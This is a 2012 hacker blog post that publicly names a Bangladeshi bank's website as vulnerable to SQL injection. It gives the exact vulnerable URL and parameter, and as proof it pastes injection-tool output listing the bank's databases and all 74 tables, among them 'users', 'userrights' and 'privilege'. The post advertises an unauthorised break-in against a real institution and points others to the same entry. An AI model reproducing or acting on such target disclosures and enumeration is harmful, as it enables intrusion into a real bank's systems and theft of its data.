Owner-UnArm3D

Thursday, 25 October 2012

Bangladeshi Bank Vulnerable to SQL injection

Website Vulnerable --> http://www.islamibankbd.com/branchinfo/branchDetail.php?BrDtlsID=60

Author -- > HUMAN_MIND_CRACKER

Proof of vulnerablity-->

Tables in mysql database -->
available databases [2]:
[*] information_schema
[*] islamidb

Database: islamidb
[74 tables]
+--------------------------+
| annualreport             |
| ar_cat                   |
| area                     |
| articles                 |
| atm                      |
| atm_area                 |
| atm_location             |
| audit_committee          |
| board_of_directors       |
| books                    |
| branchdtls               |
| branches                 |
| chairman_corner          |
| charge_commision         |
| corporate_info           |
| currencyrate             |
| currencyrate0            |
| deposit_scheme           |
| deposit_scheme_info      |
| dept                     |
| disclosure               |
| district                 |
| download                 |
| dynamicsections          |
| email                    |
| eventdetails             |
| eventdetails_11          |
| eventdetails_111         |
| events                   |
| executive_committee      |
| feb_aof_info             |
| feb_crsp_info            |
| feb_csc_info             |
| feb_nrb_info             |
| feb_rema_info            |
| feb_repa_info            |
| fex_graph                |
| interview                |
| investment               |
| jobcategory              |
| jobdetails               |
| keypersonal              |
| link                     |
| link_cat                 |
| management               |
| managementdetails        |
| manager_info             |
| md_corner                |
| md_news                  |
| md_publication           |
| news                     |
| notice                   |
| orderby                  |
| orderplacement           |
| paidup_capital           |
| personnel                |
| photo_album              |
| price_sensative_headline |
| privilege                |
| profit_rate              |
| publication              |
| qryjobs                  |
| rds_perform_details      |
| rds_perform_heading      |
| shariahcouncil           |
| shariahdetails           |
| sme_info                 |
| sme_prd_info             |
| sme_zone                 |
| sponsors                 |
| sysvalues                |
| userrights               |
| users                    |
| video                    |
+--------------------------+

0 comments:

Post a Comment

Comment for problems not for doing spam

Category 2

Category 3